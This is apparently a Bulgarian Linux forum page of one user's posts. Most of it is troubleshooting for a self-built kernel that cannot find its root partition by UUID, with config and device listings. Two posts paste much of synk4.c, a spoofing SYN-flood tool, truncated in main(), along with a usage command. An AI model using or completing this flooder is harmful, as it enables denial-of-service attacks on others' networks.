Покажи Публикации - bolero
* Виж публикациите на потр. | Виж темите на потр. | Виж прикачените файлове на потр
Страници: [1]
1  Linux секция за напреднали / Хардуерни и софтуерни проблеми / ALERT! /dev/disk/by-uuid/.... does not exist. Dr. opping to a shell -: Jul 08, 2012, 11:37
След като компилирах новия кернел ( пробвах и 2.4.4 и 3.5.5-rc) и се опитах да го буутна, получих тази грешка:

Цитат
ALERT! /dev/disk/by-uuid/5a86a3b5-3bb8-461c-b60f-0b89753d3b78 does not exist. Dropping to shell

Това става само с новите компилирани от мен кернели ( стария 3.2 си работи). Опитах се да го компилирам наново с повече опций scsi i ata, но нямах късмет. Предполагам липсват модули, които съм пропуснал (доколкото виждам не зарежда ext4)

Пробвах да добавя ext4dev to /etc/initramfs-tools/modules и да го ъпдейтна, но няма резултат. Пробвах да добавя и rootdelay= и да премахна UUID  и да пиша само root=/dev/sda2 в гръб, но не работи отново.

Цитат
cat /proc/partitions
major minor  #blocks  name

   8        0  976762584 sda
   8        1     473915 sda1
   8        2   41984000 sda2
   8        3          1 sda3
   8        4    6806528 sda4
   8        5  871020205 sda5
   8        6   55078821 sda6
   8       16  244198584 sdb
   8       17  244196001 sdb1
 251        0     489672 zram0
 251        1     489672 zram1
 251        2     489672 zram2
 251        3     489672 zram3


Цитат
cat /etc/fstab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    nodev,noexec,nosuid 0       0
# / was on /dev/sda2 during installation
UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 /               ext4    errors=remount-ro 0       1
# swap was on /dev/sda4 during installation
UUID=007a9e26-3c7b-4642-ba34-b58b3de915b2 none            swap    sw              0       0

Цитат
ls -l /dev/disk/by-id
общо 0
lrwxrwxrwx 1 root root  9 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U -> ../../sda
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part1 -> ../../sda1
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part2 -> ../../sda2
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part3 -> ../../sda3
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part4 -> ../../sda4
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part5 -> ../../sda5
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-Hitachi_HDS721010CLA332_JP9960HZ0TNZ4U-part6 -> ../../sda6
lrwxrwxrwx 1 root root  9 юли  7 08:56 ata-ST3250624AS_9ND15CXH -> ../../sdb
lrwxrwxrwx 1 root root 10 юли  7 08:56 ata-ST3250624AS_9ND15CXH-part1 -> ../../sdb1
lrwxrwxrwx 1 root root  9 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U -> ../../sda
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part1 -> ../../sda1
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part2 -> ../../sda2
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part3 -> ../../sda3
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part4 -> ../../sda4
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part5 -> ../../sda5
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_Hitachi_HDS7210_JP9960HZ0TNZ4U-part6 -> ../../sda6
lrwxrwxrwx 1 root root  9 юли  7 08:56 scsi-SATA_ST3250624AS_9ND15CXH -> ../../sdb
lrwxrwxrwx 1 root root 10 юли  7 08:56 scsi-SATA_ST3250624AS_9ND15CXH-part1 -> ../../sdb1
lrwxrwxrwx 1 root root  9 юли  7 08:56 wwn-0x5000cca375cb37a2 -> ../../sda
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part1 -> ../../sda1
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part2 -> ../../sda2
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part3 -> ../../sda3
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part4 -> ../../sda4
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part5 -> ../../sda5
lrwxrwxrwx 1 root root 10 юли  7 08:56 wwn-0x5000cca375cb37a2-part6 -> ../../sda6

Цитат
ls -l /dev/disk/by-uuid
общо 0
lrwxrwxrwx 1 root root 10 юли  7 08:56 007a9e26-3c7b-4642-ba34-b58b3de915b2 -> ../../sda4
lrwxrwxrwx 1 root root 10 юли  7 08:56 0628550D2854FD5D -> ../../sdb1
lrwxrwxrwx 1 root root 10 юли  7 08:56 5a86a3b5-3bb8-461c-b60f-0b89753d3b78 -> ../../sda2
lrwxrwxrwx 1 root root 10 юли  7 08:56 6A12F68C12F65C8F -> ../../sda6
lrwxrwxrwx 1 root root 10 юли  7 08:56 B6E86EB7E86E7591 -> ../../sda5
lrwxrwxrwx 1 root root 10 юли  7 08:56 FAF404F2F404B2C5 -> ../../sda1

Цитат
lspci
00:00.0 Host bridge: Advanced Micro Devices [AMD] nee ATI RX780/RX790 Chipset Host Bridge
00:02.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI RD790 PCI to PCI bridge (external gfx0 port A)
00:0a.0 PCI bridge: Advanced Micro Devices [AMD] nee ATI RD790 PCI to PCI bridge (PCI express gpp port F)
00:11.0 SATA controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 SATA Controller [AHCI mode]
00:12.0 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB OHCI0 Controller
00:12.1 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0 USB OHCI1 Controller
00:12.2 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB EHCI Controller
00:13.0 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB OHCI0 Controller
00:13.1 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0 USB OHCI1 Controller
00:13.2 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB EHCI Controller
00:14.0 SMBus: Advanced Micro Devices [AMD] nee ATI SBx00 SMBus Controller (rev 3c)
00:14.1 IDE interface: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 IDE Controller
00:14.3 ISA bridge: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 LPC host controller
00:14.4 PCI bridge: Advanced Micro Devices [AMD] nee ATI SBx00 PCI to PCI Bridge
00:14.5 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB OHCI2 Controller
00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration
00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Address Map
00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller
00:18.3 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control
00:18.4 Host bridge: Advanced Micro Devices [AMD] Family 10h Processor Link Control
01:00.0 VGA compatible controller: NVIDIA Corporation Device 0ca5 (rev a2)
01:00.1 Audio device: NVIDIA Corporation High Definition Audio Controller (rev a1)
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 03)
03:06.0 Multimedia audio controller: VIA Technologies Inc. ICE1712 [Envy24] PCI Multi-Channel I/O Controller (rev 02)

Цитат
cat /boot/grub/grub.cfg
#
# DO NOT EDIT THIS FILE
#
# It is automatically generated by grub-mkconfig using templates
# from /etc/grub.d and settings from /etc/default/grub
#

### BEGIN /etc/grub.d/00_header ###
if [ -s $prefix/grubenv ]; then
  set have_grubenv=true
  load_env
fi
set default="0"
if [ "${prev_saved_entry}" ]; then
  set saved_entry="${prev_saved_entry}"
  save_env saved_entry
  set prev_saved_entry=
  save_env prev_saved_entry
  set boot_once=true
fi

function savedefault {
  if [ -z "${boot_once}" ]; then
    saved_entry="${chosen}"
    save_env saved_entry
  fi
}

function recordfail {
  set recordfail=1
  if [ -n "${have_grubenv}" ]; then if [ -z "${boot_once}" ]; then save_env recordfail; fi; fi
}

function load_video {
  insmod vbe
  insmod vga
  insmod video_bochs
  insmod video_cirrus
}

insmod part_msdos
insmod ext2
set root='(hd0,msdos2)'
search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
if loadfont /usr/share/grub/unicode.pf2 ; then
  set gfxmode=auto
  load_video
  insmod gfxterm
  insmod part_msdos
  insmod ext2
  set root='(hd0,msdos2)'
  search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
  set locale_dir=($root)/boot/grub/locale
  set lang=bg_BG
  insmod gettext
fi
terminal_output gfxterm
if [ "${recordfail}" = 1 ]; then
  set timeout=-1
else
  set timeout=10
fi
### END /etc/grub.d/00_header ###

### BEGIN /etc/grub.d/05_debian_theme ###
set menu_color_normal=white/black
set menu_color_highlight=black/light-gray
### END /etc/grub.d/05_debian_theme ###

### BEGIN /etc/grub.d/10_linux ###
function gfxmode {
   set gfxpayload="${1}"
   if [ "${1}" = "keep" ]; then
      set vt_handoff=vt.handoff=7
   else
      set vt_handoff=
   fi
}
if [ "${recordfail}" != 1 ]; then
  if [ -e ${prefix}/gfxblacklist.txt ]; then
    if hwmatch ${prefix}/gfxblacklist.txt 3; then
      if [ ${match} = 0 ]; then
        set linux_gfx_mode=keep
      else
        set linux_gfx_mode=text
      fi
    else
      set linux_gfx_mode=text
    fi
  else
    set linux_gfx_mode=keep
  fi
else
  set linux_gfx_mode=text
fi
export linux_gfx_mode
if [ "${linux_gfx_mode}" != "text" ]; then load_video; fi
menuentry 'Ubuntu, with Linux 3.5.0-rc5' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   gfxmode $linux_gfx_mode
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   linux   /boot/vmlinuz-3.5.0-rc5 root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro   crashkernel=384M-2G:64M,2G-:128M
   initrd   /boot/initrd.img-3.5.0-rc5
}
menuentry 'Ubuntu, with Linux 3.5.0-rc5 (recovery mode)' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   echo   'Loading Linux 3.5.0-rc5 ...'
   linux   /boot/vmlinuz-3.5.0-rc5 root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro recovery nomodeset
   echo   'Loading initial ramdisk ...'
   initrd   /boot/initrd.img-3.5.0-rc5
}
submenu "Previous Linux versions" {
menuentry 'Ubuntu, with Linux 3.4.4' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   gfxmode $linux_gfx_mode
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   linux   /boot/vmlinuz-3.4.4 root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro   crashkernel=384M-2G:64M,2G-:128M
   initrd   /boot/initrd.img-3.4.4
}
menuentry 'Ubuntu, with Linux 3.4.4 (recovery mode)' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   echo   'Loading Linux 3.4.4 ...'
   linux   /boot/vmlinuz-3.4.4 root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro recovery nomodeset
   echo   'Loading initial ramdisk ...'
   initrd   /boot/initrd.img-3.4.4
}
menuentry 'Ubuntu, with Linux 3.2.0-26-generic' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   gfxmode $linux_gfx_mode
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   linux   /boot/vmlinuz-3.2.0-26-generic root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro   crashkernel=384M-2G:64M,2G-:128M
   initrd   /boot/initrd.img-3.2.0-26-generic
}
menuentry 'Ubuntu, with Linux 3.2.0-26-generic (recovery mode)' --class ubuntu --class gnu-linux --class gnu --class os {
   recordfail
   insmod gzio
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   echo   'Loading Linux 3.2.0-26-generic ...'
   linux   /boot/vmlinuz-3.2.0-26-generic root=UUID=5a86a3b5-3bb8-461c-b60f-0b89753d3b78 ro recovery nomodeset
   echo   'Loading initial ramdisk ...'
   initrd   /boot/initrd.img-3.2.0-26-generic
}
}
### END /etc/grub.d/10_linux ###

### BEGIN /etc/grub.d/20_linux_xen ###
### END /etc/grub.d/20_linux_xen ###

### BEGIN /etc/grub.d/20_memtest86+ ###
menuentry "Memory test (memtest86+)" {
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   linux16   /boot/memtest86+.bin
}
menuentry "Memory test (memtest86+, serial console 115200)" {
   insmod part_msdos
   insmod ext2
   set root='(hd0,msdos2)'
   search --no-floppy --fs-uuid --set=root 5a86a3b5-3bb8-461c-b60f-0b89753d3b78
   linux16   /boot/memtest86+.bin console=ttyS0,115200n8
}
### END /etc/grub.d/20_memtest86+ ###

### BEGIN /etc/grub.d/30_os-prober ###
menuentry "Windows 7 (loader) (on /dev/sda1)" --class windows --class os {
   insmod part_msdos
   insmod ntfs
   set root='(hd0,msdos1)'
   search --no-floppy --fs-uuid --set=root FAF404F2F404B2C5
   chainloader +1
}
menuentry "Windows NT/2000/XP (on /dev/sdb1)" --class windows --class os {
   insmod part_msdos
   insmod ntfs
   set root='(hd1,msdos1)'
   search --no-floppy --fs-uuid --set=root 0628550D2854FD5D
   drivemap -s (hd0) ${root}
   chainloader +1
}
### END /etc/grub.d/30_os-prober ###

### BEGIN /etc/grub.d/40_custom ###
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.
### END /etc/grub.d/40_custom ###

### BEGIN /etc/grub.d/41_custom ###
if [ -f  $prefix/custom.cfg ]; then
  source $prefix/custom.cfg;
fi
### END /etc/grub.d/41_custom ###


Това са модулите в заредения стар 3.2 кернел

Цитат
cat /proc/modules
pci_stub 12622 1 - Live 0x0000000000000000
vboxpci 23200 0 - Live 0x0000000000000000 (O)
vboxnetadp 25670 0 - Live 0x0000000000000000 (O)
vboxnetflt 23441 0 - Live 0x0000000000000000 (O)
vboxdrv 287130 3 vboxpci,vboxnetadp,vboxnetflt, Live 0x0000000000000000 (O)
zram 18642 4 - Live 0x0000000000000000 (C)
rfcomm 47604 0 - Live 0x0000000000000000
bnep 18281 2 - Live 0x0000000000000000
bluetooth 180104 10 rfcomm,bnep, Live 0x0000000000000000
snd_hda_codec_hdmi 32474 4 - Live 0x0000000000000000
ppdev 17113 0 - Live 0x0000000000000000
snd_hda_intel 33773 2 - Live 0x0000000000000000
snd_hda_codec 127706 2 snd_hda_codec_hdmi,snd_hda_intel, Live 0x0000000000000000
snd_hwdep 13668 1 snd_hda_codec, Live 0x0000000000000000
ip6t_LOG 16974 4 - Live 0x0000000000000000
xt_hl 12521 6 - Live 0x0000000000000000
ip6t_rt 12558 3 - Live 0x0000000000000000
snd_ice1712 75629 2 - Live 0x0000000000000000
snd_ice17xx_ak4xxx 13315 1 snd_ice1712, Live 0x0000000000000000
snd_ak4xxx_adda 18904 2 snd_ice1712,snd_ice17xx_ak4xxx, Live 0x0000000000000000
snd_cs8427 14297 1 snd_ice1712, Live 0x0000000000000000
snd_ac97_codec 134826 1 snd_ice1712, Live 0x0000000000000000
snd_pcm 97188 5 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec,snd_ice1712,snd_ac97_codec, Live 0x0000000000000000
nf_conntrack_ipv6 13906 7 - Live 0x0000000000000000
nf_defrag_ipv6 13368 1 nf_conntrack_ipv6, Live 0x0000000000000000
ac97_bus 12730 1 snd_ac97_codec, Live 0x0000000000000000
snd_i2c 14191 2 snd_ice1712,snd_cs8427, Live 0x0000000000000000
snd_mpu401_uart 14169 1 snd_ice1712, Live 0x0000000000000000
snd_seq_midi 13324 0 - Live 0x0000000000000000
ipt_REJECT 12576 1 - Live 0x0000000000000000
ipt_LOG 12919 5 - Live 0x0000000000000000
snd_rawmidi 30748 2 snd_mpu401_uart,snd_seq_midi, Live 0x0000000000000000
xt_multiport 12597 4 - Live 0x0000000000000000
snd_seq_midi_event 14899 1 snd_seq_midi, Live 0x0000000000000000
nvidia 10888310 30 - Live 0x0000000000000000 (P)
asus_atk0110 18078 0 - Live 0x0000000000000000
snd_seq 61896 2 snd_seq_midi,snd_seq_midi_event, Live 0x0000000000000000
parport_pc 32866 1 - Live 0x0000000000000000
xt_limit 12711 12 - Live 0x0000000000000000
k10temp 13166 0 - Live 0x0000000000000000
sp5100_tco 13791 0 - Live 0x0000000000000000
xt_tcpudp 12603 42 - Live 0x0000000000000000
edac_core 53746 0 - Live 0x0000000000000000
edac_mce_amd 23709 0 - Live 0x0000000000000000
i2c_piix4 13301 0 - Live 0x0000000000000000
xt_addrtype 12713 4 - Live 0x0000000000000000
snd_timer 29990 2 snd_pcm,snd_seq, Live 0x0000000000000000
snd_seq_device 14540 3 snd_seq_midi,snd_rawmidi,snd_seq, Live 0x0000000000000000
xt_state 12578 14 - Live 0x0000000000000000
ip6table_filter 12815 1 - Live 0x0000000000000000
snd 78855 23 snd_hda_codec_hdmi,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_ice1712,snd_ak4xxx_adda,snd_cs8427,snd_ac97_codec,snd_pcm,snd_i2c,snd_mpu401_uart,snd_rawmidi,snd_seq,snd_timer,snd_seq_device, Live 0x0000000000000000
ip6_tables 27864 3 ip6t_LOG,ip6t_rt,ip6table_filter, Live 0x0000000000000000
mac_hid 13253 0 - Live 0x0000000000000000
wmi 19256 0 - Live 0x0000000000000000
nf_conntrack_netbios_ns 12665 0 - Live 0x0000000000000000
nf_conntrack_broadcast 12589 1 nf_conntrack_netbios_ns, Live 0x0000000000000000
nf_nat_ftp 12704 0 - Live 0x0000000000000000
nf_nat 25891 1 nf_nat_ftp, Live 0x0000000000000000
nf_conntrack_ipv4 19716 9 nf_nat, Live 0x0000000000000000
nf_defrag_ipv4 12729 1 nf_conntrack_ipv4, Live 0x0000000000000000
nf_conntrack_ftp 13452 1 nf_nat_ftp, Live 0x0000000000000000
nf_conntrack 81926 8 nf_conntrack_ipv6,xt_state,nf_conntrack_netbios_ns,nf_conntrack_broadcast,nf_nat_ftp,nf_nat,nf_conntrack_ipv4,nf_conntrack_ftp, Live 0x0000000000000000
soundcore 15091 1 snd, Live 0x0000000000000000
iptable_filter 12810 1 - Live 0x0000000000000000
snd_page_alloc 18529 2 snd_hda_intel,snd_pcm, Live 0x0000000000000000
ip_tables 27473 1 iptable_filter, Live 0x0000000000000000
x_tables 29846 14 ip6t_LOG,xt_hl,ip6t_rt,ipt_REJECT,ipt_LOG,xt_multiport,xt_limit,xt_tcpudp,xt_addrtype,xt_state,ip6table_filter,ip6_tables,iptable_filter,ip_tables, Live 0x0000000000000000
lp 17799 0 - Live 0x0000000000000000
parport 46562 3 ppdev,parport_pc,lp, Live 0x0000000000000000
pata_atiixp 13204 0 - Live 0x0000000000000000
usbhid 47199 0 - Live 0x0000000000000000
r8169 62099 0 - Live 0x0000000000000000
hid 99559 1 usbhid, Live 0x0000000000000000

Цитат

sudo blkid
/dev/sda1: UUID="FAF404F2F404B2C5" TYPE="ntfs"
/dev/sda2: UUID="5a86a3b5-3bb8-461c-b60f-0b89753d3b78" TYPE="ext4"
/dev/sda4: UUID="007a9e26-3c7b-4642-ba34-b58b3de915b2" TYPE="swap"
/dev/sda5: UUID="B6E86EB7E86E7591" TYPE="ntfs"
/dev/sda6: UUID="6A12F68C12F65C8F" TYPE="ntfs"
/dev/sdb1: UUID="0628550D2854FD5D" TYPE="ntfs"
/dev/zram0: UUID="71a40e10-9215-40ea-a9c2-a30fb3ee5af3" TYPE="swap"
/dev/zram1: UUID="f631b2f4-8760-4415-a4ff-37e875b0c155" TYPE="swap"
/dev/zram2: UUID="e7518a2b-be54-4ee7-ac16-f1c66b7047b5" TYPE="swap"
/dev/zram3: UUID="2eacb99e-be39-4162-b2e6-1e0e864ca0c5" TYPE="swap"

Дайте ми някакви съвети моля, защото се изчерпах вече :) Благодаря
2  Linux секция за начинаещи / Настройка на програми / Cronhowto: Работа със “старицата” -: Aug 06, 2008, 19:36
Ако искате да разберете какво е крон (cron), кронтаб(crontab) и как да направите изпълнението на задачи много по-лесно кликнете ТУК.Статията е изчерпаема и подробна.

Приятно четене.3  Linux секция за начинаещи / Настройка на програми / Howto: Линукс - macos x трансформация. -: Aug 06, 2008, 19:24
Всеки с вкуса си '<img'>
4  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Проблеми с компилация на .c -: Aug 04, 2008, 18:46
Прави си компилирал се е, но когато го тествам върху другата машина нета спира на тази веднага щом го спра нета идва.

./synk4 0 192.168.0.104 21 80
5  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Проблеми с компилация на .c -: Aug 04, 2008, 18:25
Искам да тествам системата ми против syn flood, но имам проблеми с компилирането на synk4.c

Това е кода:

Примерен код
/* Syn Flooder by Zakath
 * TCP Functions by trurl_ (thanks man).
 * Some more code by Zakath.
 * Speed/Misc Tweaks/Enhancments -- ultima
 * Nice Interface -- ultima
 * Random IP Spoofing Mode -- ultima
 * How To Use:
 * Usage is simple. srcaddr is the IP the packets will be spoofed from.
 * dstaddr is the target machine you are sending the packets to.
 * low and high ports are the ports you want to send the packets to.
 * Random IP Spoofing Mode: Instead of typing in a source address,
 * just use '0'. This will engage the Random IP Spoofing mode, and
 * the source address will be a random IP instead of a fixed ip.
 * Released: [4.29.97]
 *  To compile: cc -o synk4 synk4.c
 *
 * Addition and Change by Kenji Aiko
 * Released: [11.24.04]
 *  Vine Linux 2.4
 *  To compile: gcc -Wall synk4 synk4.c
 */
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

/* These can be handy if you want to run the flooder while the admin is on
 * this way, it makes it MUCH harder for him to kill your flooder */
/* Ignores all signals except Segfault */
// #define HEALTHY
/* Ignores Segfault */
// #define NOSEGV
/* ret random num function */
#define getrandom(min, max) ((rand() % (int)(((max) + 1) - (min))) + (min))

/* global: socket and send packet num */
int sock, packetcnt;


/* Check Sum */
unsigned short ip_sum(unsigned short *addr, int len)
{
  int sum = 0;
  unsigned short answer = 0;
 
  while (len > 1){
    sum += *addr++;
    len -= 2;
  }
  if (len == 1){
    *(unsigned char *)(&answer) = *(unsigned char *)addr;
    sum += answer;
  }
  sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  sum += (sum >> 16);                 /* add carry */
  answer = ~sum;                      /* truncate to 16 bits */
  return(answer);
}


/* get address */
unsigned long getaddr(char *name)
{
  struct hostent *hep;
  hep = gethostbyname(name);
  if(!hep){
    fprintf(stderr, "Unknown host %s\n", name);
    exit(1);
  }
  return *(unsigned long *)hep->h_addr;
}/* ------------------------------------------------------------------
 * make & send tcp packet
 * ------------------------------------------------------------------ */

void send_tcp_segment(struct iphdr *ih,
            struct tcphdr *th,
            char *data,
            int dlen)
{
  char buf[4048];

  struct {  /* rfc 793 tcp pseudo-header */
    unsigned long saddr, daddr;
    char mbz;
    char ptcl;
    unsigned short tcpl;
  } ph;

  /* how necessary is this, given that
     the destination address is already in the ip header? */ 
  struct sockaddr_in sin;
 
  ph.saddr = ih->saddr;
  ph.daddr = ih->daddr;
  ph.mbz   = 0;
  ph.ptcl  = IPPROTO_TCP;
  ph.tcpl  = htons(sizeof(*th) + dlen);
 
  memcpy(buf, &ph, sizeof(ph));
  memcpy(buf + sizeof(ph), th, sizeof(*th));
  memcpy(buf + sizeof(ph) + sizeof(*th), data, dlen);
  memset(buf + sizeof(ph) + sizeof(*th) + dlen, 0, 4);
  th->check = ip_sum((unsigned short *)buf,
           (sizeof(ph) + sizeof(*th) + dlen + 1) & ~1);
 
  memcpy(buf, ih, 4 * ih->ihl);
  memcpy(buf + 4 * ih->ihl, th, sizeof(*th));
  memcpy(buf + 4 * ih->ihl + sizeof(*th), data, dlen);
  memset(buf + 4 * ih->ihl + sizeof(*th) + dlen, 0, 4);
  ih->check = ip_sum((unsigned short *)buf,
           (4 * ih->ihl + sizeof(*th) + dlen + 1) & ~1);

  memcpy(buf, ih, 4 * ih->ihl);
 
  sin.sin_family      = AF_INET;
  sin.sin_port        = th->dest;
  sin.sin_addr.s_addr = ih->daddr;
 
  if(sendto(sock, buf, 4 * ih->ihl + sizeof(*th) + dlen,
       0, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    fprintf(stderr, "Error sending syn packet.\n");
    exit(1);
  }
}


void spoof_open(unsigned long my_ip,
                unsigned long their_ip,
                unsigned short srcport,
                unsigned short desport)
{
  struct iphdr ih;
  struct tcphdr th;

  struct timeval tv;
  gettimeofday(&tv, 0);

  ih.version  = 4;
  ih.ihl      = 5;
  ih.tos      = 0; /* XXX is this normal? */
  ih.tot_len  = sizeof(ih) + sizeof(th);
  ih.id       = htons(random());
  ih.frag_off = 0;
  ih.ttl      = 255;
  ih.protocol = IPPROTO_TCP;
  ih.check    = 0;
  ih.saddr    = my_ip;
  ih.daddr    = their_ip;
 
  th.source   = htons(srcport);
  th.dest     = htons(desport);
  th.seq      = htonl(tv.tv_usec);
  th.doff     = sizeof(th) / 4;
  th.ack_seq  = 0;
  th.res1     = 0;
  th.fin      = 0;
  th.syn      = 1;
  th.rst      = 0;
  th.psh      = 0;
  th.ack      = 0;
  th.urg      = 0;
  th.res2     = 0;
  th.window   = htons(65535);
  th.check    = 0;
  th.urg_ptr  = 0;
 
  send_tcp_segment(&ih, &th, "", 0);
}/* ------------------------------------------------------------------
 * signal functions
 * ------------------------------------------------------------------ */

void sig_exit(int crap)
{
#ifndef HEALTHY
  fprintf(stderr, "Signal Caught. Exiting Cleanly.\n");
  exit(crap);
#endif
}


void sig_segv(int crap)
{
#ifndef NOSEGV
  fprintf(stderr, "Segmentation Violation Caught. Exiting Cleanly.\n");
  exit(crap);
#endif
}


void sig_alrm(int crap)
{
  static int timecnt = 0;
  printf("LapTime:%d000(ms), SendPacket:%d\n", timecnt++, packetcnt);
  alarm(1);
}


void init_signals(void)
{
  signal (SIGSEGV,   sig_segv);   signal (SIGALRM,   sig_alrm);
  signal (SIGHUP,    sig_exit);   signal (SIGINT,    sig_exit);
  signal (SIGQUIT,   sig_exit);   signal (SIGILL,    sig_exit);
  signal (SIGTRAP,   sig_exit);   signal (SIGIOT,    sig_exit);
  signal (SIGBUS,    sig_exit);   signal (SIGFPE,    sig_exit);
  signal (SIGKILL,   sig_exit);   signal (SIGUSR1,   sig_exit);
  signal (SIGUSR2,   sig_exit);   signal (SIGPIPE,   sig_exit);
  signal (SIGTERM,   sig_exit);   signal (SIGPWR,    sig_exit);
  signal (SIGCHLD,   sig_exit);   signal (SIGCONT,   sig_exit);
  signal (SIGSTOP,   sig_exit);   signal (SIGTSTP,   sig_exit);
  signal (SIGTTIN,   sig_exit);   signal (SIGTTOU,   sig_exit);
  signal (SIGURG,    sig_exit);   signal (SIGXCPU,   sig_exit);
  signal (SIGXFSZ,   sig_exit);   signal (SIGVTALRM, sig_exit);
  signal (SIGPROF,   sig_exit);   signal (SIGWINCH,  sig_exit);
  signal (SIGIO,     sig_exit);   
}/* ------------------------------------------------------------------
 * main function
 * ------------------------------------------------------------------ */

int main(int argc, char *argv[])
{
  int i, j, diff, urip, lowport, highport, srcport;
  unsigned long them, me_fake;
  char junk[1024];

  if(argc < 5){
    fprintf(stderr, "Usage: %s <srcIP> <dstIP> <lowPort> <highPort>\n", argv[0]);
    fprintf(stderr, " If srcIP is 0, random addresses will be used\n\n");
    return 1;
  }

  urip = 0;
  if(atoi(argv[1]) == 0)
    urip = 1;
  else
    me_fake = getaddr(argv[1]);

